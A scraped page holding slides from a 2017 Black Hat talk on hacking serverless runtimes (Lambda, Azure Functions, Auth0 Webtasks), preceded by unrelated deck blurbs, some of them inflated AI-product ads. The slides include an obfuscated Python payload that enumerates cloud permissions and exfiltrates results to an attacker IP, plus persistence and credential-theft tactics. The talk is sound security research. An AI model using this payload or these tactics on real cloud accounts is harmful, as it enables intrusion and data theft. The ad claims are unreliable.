Similar to Us 17-krug-hacking-severless-runtimes (20)
When deliberating between CodeIgniter vs CakePHP for web development, consider their respective strengths and your project requirements. CodeIgniter, known for its simplicity and speed, offers a lightweight framework ideal for rapid development of small to medium-sized projects. It's praised for its straightforward configuration and extensive documentation, making it beginner-friendly. Conversely, CakePHP provides a more structured approach with built-in features like scaffolding, authentication, and ORM. It suits larger projects requiring robust security and scalability. Ultimately, the choice hinges on your project's scale, complexity, and your team's familiarity with the frameworks.
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeAftab Hussain
Understanding variable roles in code has been found to be helpful by students
in learning programming -- could variable roles help deep neural models in
performing coding tasks? We do an exploratory study.
- These are slides of the talk given at InteNSE'23: The 1st International Workshop on Interpretability and Robustness in Neural Software Engineering, co-located with the 45th International Conference on Software Engineering, ICSE 2023, Melbourne Australia
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
Artificia Intellicence and XPath Extension FunctionsOctavian Nadolu
The purpose of this presentation is to provide an overview of how you can use AI from XSLT, XQuery, Schematron, or XML Refactoring operations, the potential benefits of using AI, and some of the challenges we face.
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxrickgrimesss22
Discover the essential features to incorporate in your Winzo clone app to boost business growth, enhance user engagement, and drive revenue. Learn how to create a compelling gaming experience that stands out in the competitive market.
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...kalichargn70th171
A dynamic process unfolds in the intricate realm of software development, dedicated to crafting and sustaining products that effortlessly address user needs. Amidst vital stages like market analysis and requirement assessments, the heart of software development lies in the meticulous creation and upkeep of source code. Code alterations are inherent, challenging code quality, particularly under stringent deadlines.
Atelier - Innover avec l’IA Générative et les graphes de connaissancesNeo4j
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Allez au-delà du battage médiatique autour de l’IA et découvrez des techniques pratiques pour utiliser l’IA de manière responsable à travers les données de votre organisation. Explorez comment utiliser les graphes de connaissances pour augmenter la précision, la transparence et la capacité d’explication dans les systèmes d’IA générative. Vous partirez avec une expérience pratique combinant les relations entre les données et les LLM pour apporter du contexte spécifique à votre domaine et améliorer votre raisonnement.
Amenez votre ordinateur portable et nous vous guiderons sur la mise en place de votre propre pile d’IA générative, en vous fournissant des exemples pratiques et codés pour démarrer en quelques minutes.
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppGoogle
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-fusion-buddy-review
AI Fusion Buddy Review: Key Features
✅Create Stunning AI App Suite Fully Powered By Google's Latest AI technology, Gemini
✅Use Gemini to Build high-converting Converting Sales Video Scripts, ad copies, Trending Articles, blogs, etc.100% unique!
✅Create Ultra-HD graphics with a single keyword or phrase that commands 10x eyeballs!
✅Fully automated AI articles bulk generation!
✅Auto-post or schedule stunning AI content across all your accounts at once—WordPress, Facebook, LinkedIn, Blogger, and more.
✅With one keyword or URL, generate complete websites, landing pages, and more…
✅Automatically create & sell AI content, graphics, websites, landing pages, & all that gets you paid non-stop 24*7.
✅Pre-built High-Converting 100+ website Templates and 2000+ graphic templates logos, banners, and thumbnail images in Trending Niches.
✅Say goodbye to wasting time logging into multiple Chat GPT & AI Apps once & for all!
✅Save over $5000 per year and kick out dependency on third parties completely!
✅Brand New App: Not available anywhere else!
✅ Beginner-friendly!
✅ZERO upfront cost or any extra expenses
✅Risk-Free: 30-Day Money-Back Guarantee!
✅Commercial License included!
See My Other Reviews Article:
(1) AI Genie Review: https://sumonreview.com/ai-genie-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
#AIFusionBuddyReview,
#AIFusionBuddyFeatures,
#AIFusionBuddyPricing,
#AIFusionBuddyProsandCons,
#AIFusionBuddyTutorial,
#AIFusionBuddyUserExperience
#AIFusionBuddyforBeginners,
#AIFusionBuddyBenefits,
#AIFusionBuddyComparison,
#AIFusionBuddyInstallation,
#AIFusionBuddyRefundPolicy,
#AIFusionBuddyDemo,
#AIFusionBuddyMaintenanceFees,
#AIFusionBuddyNewbieFriendly,
#WhatIsAIFusionBuddy?,
#HowDoesAIFusionBuddyWorks
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Preparing Non - Technical Founders for Engaging a Tech AgencyISH Technologies
Preparing non-technical founders before engaging a tech agency is crucial for the success of their projects. It starts with clearly defining their vision and goals, conducting thorough market research, and gaining a basic understanding of relevant technologies. Setting realistic expectations and preparing a detailed project brief are essential steps. Founders should select a tech agency with a proven track record and establish clear communication channels. Additionally, addressing legal and contractual considerations and planning for post-launch support are vital to ensure a smooth and successful collaboration. This preparation empowers non-technical founders to effectively communicate their needs and work seamlessly with their chosen tech agency.Visit our site to get more details about this. Contact us today www.ishtechnologies.com.au
Launch Your Streaming Platforms in MinutesRoshan Dwivedi
The claim of launching a streaming platform in minutes might be a bit of an exaggeration, but there are services that can significantly streamline the process. Here's a breakdown:
Pros of Speedy Streaming Platform Launch Services:
No coding required: These services often use drag-and-drop interfaces or pre-built templates, eliminating the need for programming knowledge.
Faster setup: Compared to building from scratch, these platforms can get you up and running much quicker.
All-in-one solutions: Many services offer features like content management systems (CMS), video players, and monetization tools, reducing the need for multiple integrations.
Things to Consider:
Limited customization: These platforms may offer less flexibility in design and functionality compared to custom-built solutions.
Scalability: As your audience grows, you might need to upgrade to a more robust platform or encounter limitations with the "quick launch" option.
Features: Carefully evaluate which features are included and if they meet your specific needs (e.g., live streaming, subscription options).
Examples of Services for Launching Streaming Platforms:
Muvi [muvi com]
Uscreen [usencreen tv]
Alternatives to Consider:
Existing Streaming platforms: Platforms like YouTube or Twitch might be suitable for basic streaming needs, though monetization options might be limited.
Custom Development: While more time-consuming, custom development offers the most control and flexibility for your platform.
Overall, launching a streaming platform in minutes might not be entirely realistic, but these services can significantly speed up the process compared to building from scratch. Carefully consider your needs and budget when choosing the best option for you.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Mobile App Development Company In Noida | Drona InfotechDrona Infotech
Looking for a reliable mobile app development company in Noida? Look no further than Drona Infotech. We specialize in creating customized apps for your business needs.
Visit Us For : https://www.dronainfotech.com/mobile-application-development/
DDS Security Version 1.2 was adopted in 2024. This revision strengthens support for long runnings systems adding new cryptographic algorithms, certificate revocation, and hardness against DoS attacks.
OpenMetadata Community Meeting - 5th June 2024OpenMetadata
The OpenMetadata Community Meeting was held on June 5th, 2024. In this meeting, we discussed about the data quality capabilities that are integrated with the Incident Manager, providing a complete solution to handle your data observability needs. Watch the end-to-end demo of the data quality features.
* How to run your own data quality framework
* What is the performance impact of running data quality frameworks
* How to run the test cases in your own ETL pipelines
* How the Incident Manager is integrated
* Get notified with alerts when test cases fail
Watch the meeting recording here - https://www.youtube.com/watch?v=UbNOje0kf6E
2. Presenters : Who are they?
Andrew Krug : @andrewkrug
- Security Engineer @ Mozilla
- Cloud Security
- Identity and Access Management
- Founder of ThreatResponse Project
https://github.com/threatresponse
https://threatresponse.cloud
- AWS_IR, Margarita Shotgun -- Automate all the
things!
- Also @ Black Hat Arsenal
- Thursday 11:15am-12:15pm | Business Hall, Level 2
3. Presenters : Who are they?
Graham Jones :
- Software Developer @ Legitscript
- Data warehousing + analytics
- Use lambda for internal apps
7. Why serverless at all?
• Parallelism
• Infinite scale(ish)
• Fan out pattern is easy
• Automagic Event
Triggers
• Security Features
• HA is simpler
• Enforced Architecture
• Little to no management
10. Serverless is Hope
• Hope that your code executes securely.
• Hope that others can not tamper with the execution.
• Hope that the vendor is patching the operating system.
• Hope that your code hasn’t been modified in transit to the sandbox.
• Hope that this is somehow
11. more secure than your own servers.
Serverless is the hope that these environments are:
12. What you will learn in this talk:
1. How different vendors implement their sandbox. ( Isolation technology )
2. Attack patterns and techniques for persistence in various environments.
3. How to build your own test tools to hack the sandbox.
( This is the hacking part of the talk )
39. Term 1
Cold Start:
Cold start occurs when code is loaded into the sandbox and the
container is first instantiated. Small performance penalties exist
in every vendor environment for this. ~600ms
40. Term 2
Warmness:
Due to the aforementioned performance penalty most vendors
keep an execution environment around for a period as a “warm”
container to spare you this penalty. However -- this opens the
door for some persistence. ( ephemeral persistence really )
Skip Transfer
Function Warm
41. The first person to demonstrate attacking this:
Rich Jones :
Creator, Zappa Framework
Talk: Gone in 60 Milliseconds
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
44. How do these look from the outside:
x-amzn-requestid: 42afae07-6337-11e7-978e-a16a4ab3a0b4
x-amzn-remapped-content-length: 52156
etag: "315532800.0-52156-1721700440"
x-amzn-trace-id: sampled=0;root=1-595fc0a9-78f9eb5db9c2557354f3f23a
accept-ranges: bytes
x-amzn-remapped-date: Fri, 07 Jul 2017 17:11:05 GMT
x-cache: Miss from cloudfront
via: 1.1 3a286aa16b0a5dffb0381ae205a4a273.cloudfront.net (CloudFront)
x-amz-cf-id: oIZYWXpxJpVv-vSI4PUVBtS9dw4NXGWdH1PgLzaJB53TxmjrMIcw6w==
X-Firefox-Spdy: h2
45. How do these look from the outside:
HTTP/1.1 200 OK
x-auth0-proxy-stats:
{"proxy_host":"172.31.201.234","proxy_pid":21278,"container_id":"af6aeb0f-8fb
7-4681-ac1b-7cc6767a0d60","latency":17,"uptime":177206.295,"memory":{"rss":14
4560128,"heapTotal":93000288,"heapUsed":58777040,"external":21543833},"req_id
":"1499637266377.949008"}
content-type: text/html
x-auth0-stats:
{"worker_pid":1,"response":{"200":2},"time":1,"uptime":79.76,"memory":{"rss":
42840064,"heapTotal":21880928,"heapUsed":16588512}}
x-wt-response-source: webtask
date: Sun, 09 Jul 2017 21:54:26 GMT
46. How do these look from the outside:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 94
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Jul 2017 17:13:30 GMT
51. Do you have a problem with using
something that you can not audit?
52. #!/usr/bin/python
import os
def call_shell_wrapper(args):
"""
Intended to make it easy to add additional metrics from shell calls,
such as capturing return values, etc.
Currently no additional value.
Subprocess module is recommended but didn't work for some uname calls.
"""
return os.popen(" ".join(args)).read()
Digging around
Inspired by: Eric Hammond’s Lambdash https://github.com/alestic/lambdash
54. What are some common things we are looking for in all runtimes?
• Is it an operating system
derivative?
• If so are the general things true:
• Can read/write everywhere?
• Can poison code?
• Can get/set environment vars?
• Are the permissions in the cloud:
• Too permissive
• Just right?
• What about internet access?
• Egress vs Egress + Ingress
58. AWS Lambda : What do we know.
• Some kind of container system
• Runs on Amazon Linux
• (RHEL 6 derivative)
• Read only file system
• Code injected into /var/run/task
• Non-root user
• Single AWS IAM role accessible to sandbox
• Reverse shell not possible
• Internet egress ( in some cases )
59. AWS Lambda : What we wanted to know
• Credential stealing:
• Can we do it?
• How bad is it?
• Where can we persist code?
• How long can we persist code?
• Warmness Attacks
• Can we get lambda to do things other
than execute code in the language we
prefer to use.
• How frequently does OS and runtime get
patched. Python modules ( etc )
62. So what’s your strategy given these limits?
● Initial payload as small as possible.
● Persist in /tmp
● Assess lateral movement fast as you can
● Exfil your results somewhere else
63. In other words… your attack needs to be bigger
on the inside.
65. Recon The Sandbox
https://gist.github.com/andrewkrug/c2a8858e1f63d9bcf38706048db2926a
def _cloudwatch_create_log_group(client):
try:
response = client.create_log_group(
logGroupName="serverless-observatory-check-{uuid}".format(uuid=uuid.uuid4().hex),
)
return True
except botocore.exceptions.ClientError as e:
return False
### Brute out permissions by simply attempting boto calls etc…
66. One liner is a cool way to pack the payload
(lambda __print, __g, __contextlib, __y: [[[[[[(lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None),
__out[0](lambda: ('nChecks to run if the environment is
AWS.nnlogs:CreateLogGroupnlogs:CreateLogStreamnlogs:PutLogEventsnec2:DescribeTagsnsqs:ListQueuesnsqs:PutMessagenn',
[[[[[[[[[[(lambda __after: (json.dumps(check_cloudwatch()), (exfil_the_data(json.dumps(check_cloudwatch())),
(exfil_the_data(json.dumps(check_ec2())), (exfil_the_data(json.dumps(check_sqs())), __after())[1])[1])[1])[1] if (__name__ == '__main__')
else __after())(lambda: None) for __g['exfil_the_data'], exfil_the_data.__name__ in [(lambda data: (lambda __l:
[[[[[[(__print(__l['response']), None)[1] for __l['response'] in [(urllib2.urlopen(__l['req']))]][0] for __l['req'] in
[(urllib2.Request('http://{EXFIL_IP}/'.format(EXFIL_IP=__l['exfil_ip']), data=__l['data'], headers=__l['headers']))]][0] for __l['headers']
in [({'Content-Type': 'application/json'})]][0] for __l['data'] in [(__l['data'].encode('utf-8'))]][0] for __l['exfil_ip'] in
[(os.getenv('EXFIL_IP'))]][0] for __l['data'] in [(data)]][0])({}), 'exfil_the_data')]][0] for __g['check_sqs'], check_sqs.__name__ in
[(lambda : (lambda __l: [[__l['results'] for __l['results'] in [({'ListQueues': _sqs_can_list_queues(__l['sqs']), 'PutMessage':
_sqs_can_put_message(__l['sqs'])})]][0] for __l['sqs'] in [(boto3.client('sqs'))]][0])({}), 'check_sqs')]][0] for
__g['_sqs_can_put_message'], _sqs_can_put_message.__name__ in [(lambda client: (lambda __l: [(lambda __out: (lambda __ctx:
[__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda
self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype,
botocore.exceptions.ClientError) and [[True for __out[0] in [((lambda ret: lambda after: ret)(False))]][0] for __l['e'] in
[(__value)]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for
__out[0] in [([(lambda __after: (lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [(lambda __out: (lambda __ctx:
[__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: __this())][2])(__contextlib.nested(type('except', (), {'__enter__':
lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [(lambda
after: after())]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback:
[False for __out[0] in [((__l['client'].send_message(QueueUrl=__l['queue'], MessageBody={}), (lambda ret: lambda after: ret)((lambda ret:
lambda after: ret)(True)))[1])]][0]})())))([None]) for __l['queue'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items,
__sentinel)))())(iter(__l['response']['QueueUrls']), lambda: (lambda ret: lambda after: ret)(False), []) if (__l['response'].get('QueueUrls',
None) is not None) else (lambda ret: lambda after: ret)(False))(lambda: (lambda __after: __after())) for
https://github.com/csvoss/onelinerizer
67. Demo App
• Slack Bot Built with Serverless
• Takes a github webhook
• Notifies the channel
• Code injection through string
escape.
https://github.com/ThreatResponse/poor-webhook/blob/master/mention.py#L37
72. Attack Surface Becomes Larger with Bad IAM
The issue is frameworks:
(Do audit your frameworks)
Zappa
Flask
Apex
(Some are better at IAM than others)
74. The IAM Struggle is Real
IAM is the “killer feature” and the “killer feature” -- @0x7eff
75. Detection is hard here…
On premise we have:
• Network Taps
• Auditd
• Syslog Shipping
• Other SIEM functions...
In the Cloud we have:
• Cloudwatch Logs
• Other stuff we do ourselves.
78. Lambda IOCs
• Anomalous Execution Times
• High Error Rates
• CloudTrail high denials/s for
the Lambda Role
This activity is as detectable as detecting a
moon balloon terrorizing a city.
81. Azure : What do we know.
• Runs on Windows
• Has sets of functions grouped within ‘apps’:
• File system is largely writable
• Do have internet egress
• Non-root user
• All functions in same ‘app’ share system
• All functions in same app execute as same user
• App root: D:home
• Code injected into sitewwwroot<FnName>
• Some secrets are stored in dataFunctionssecrets
Azure Sandbox Info : https://github.com/projectkudu/kudu
82. Azure : What we wanted to know
• Same general questions as lambda but
focused on the different function layout of
Azure
• What can one function do to another in
the same app?
83. Azure : Other tidbits
• No WMI access
• Get-EventLog -List does return objects
84. Digging around
• Use programmatic shell wrapper as before
• Less ephemeral system means more tools
• Project Kudu UI very helpful for initial exploring:
• CMD/Powershell terminal
• Process list
• Generally reduces pain of investigation
• Earlier profiler only somewhat reusable
• Can shell out to powershell!
85. • Concept: credit card batcher
• Unique to Azure: multiple Functions in one Application
• Demonstrate intended use of API
• Use node’s easy done triggering to get custom result back
• (logging red flag!)
Vulnerable app concept
86.
87. • Use shared Application tenancy to:
• List all other functions in the application
• Change API keys required for different functions
• Change triggering methods of other functions
• Change source of other functions
Vulnerable app process
90. Webtasks: What we know
• Webtask is open source
• https://github.com/auth0/webtask-runtime
• Runs docker containers on CoreOS
• Allegedly nodejs only
• No restriction on egress
• Used in auth0 rule engine and other stuff.
• Public and Private Tenants
93. Auth0 Webshell by @kangsterizer aka Guillaume Destuynder
aka guy at Mozilla who really likes bikes and gifs of foxes.
https://gist.github.com/gdestuynder/b2a785f0d7208d73cce35460ca8dee1a
94. Auth0 Webshell by @kangsterizer aka Guillaume Destuynder
aka guy at Mozilla who really likes bikes and gifs of foxes.
95.
96.
97. Auth0 Learnings
• Forked processes hang the container.
• Backchannel.sock is a socket that hits a
REST endpoint. ( Likely for credential
exchanges during auth )
• Sandbox is escapable to container.
• Sandbox system is Debian based with
little anomaly detection / monitoring.
99. What does it do?
• Gather ‘/etc/issue’
● Gather Present Working Directory
● System Version Information
● Telemetry on Attached Filesystems
● Writability and Persist Ability
● Warmness Checks ( Is my provider recycling my sandbox? )
● Processor and Memory Telemetry
● Information on Native Libraries in Runtime
● Running Process
● Contents of Environment
● Sensitive Environment Identification and Sanitization
● Hashing of suspicious files in tmp locations
100. Why does this matter?
• When does the environment change.
• How often do patches happen.
• Allows us to keep the vendors honest.
• Gives us clues sometimes to new features
coming.
102. If you think this is cool:
Sign up for our mailing list on https://threatresponse.cloud
103. How do the Security Features Stack Up?
Vendor Restricts
Language
Executing
Read Only
Filesystem
Patches
Frequently
Granular
IAM
Internet
Egress
Immutable
Env Vars
Has
Warmness
Capability
Azure
AWS
Auth0
105. What would we ask of the vendor space?
● Native code signing.
● Immutable env vars.
● Ability to choose cold start in favor of security.
● Ability to kill any process that’s not the language runtime
automagically.
● More transparency in patch cycle and “trade secrets”.
106. Thank You
“Beetle” Bailey
Bilal Alam
Daniel Hartnell
Guillaume Destuynder
Henrik Johansson
Jeff Bryner
Jeff Parr
Joel Ferrier
Zack Glick
108. Questions from the audience?
After this we’ll be somewhere… maybe a breakout maybe the hallway?
Don’t forget about my arsenal talk… Thursday 11:15am-12:15pm | Business Hall, Level 2